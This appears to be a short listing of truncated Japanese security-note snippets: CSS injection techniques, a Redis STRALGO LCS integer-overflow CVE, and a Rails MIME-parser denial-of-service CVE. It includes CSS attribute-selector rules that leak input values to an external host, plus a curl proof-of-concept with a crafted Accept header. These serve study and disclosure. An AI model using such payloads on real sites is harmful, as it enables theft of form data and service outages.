CSS インジェクションの手法 雑メモです 属性値のリーク 属性セレクタを使う 広く知られている手法。CSS の属性セレクタを使って取得する。 input[value^="a"] { background: url('http://external.host/?c=a'); } input[value^="b"] { background: url('htt…

CVE-2021-29477 Redis <6.2.3, <6.0.13 6.2.3 と 6.0.13 で修正済み STRALGO LCS コマンドで整数オーバーフロー、Remote Code Execution の可能性 https://redis.io/commands/stralgo LCS サブコマンドは longest common subsequence アルゴリズムを実装しま…

Denial of Service in Action Dispatch · CVE-2021-22902 · GitHub Advisory Database · GitHub CVE-2021-22902 Rails ActionPack MIME Type parser DoS PoC: `curl -H 'Accept: text/html ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0 ;0;' -X POST…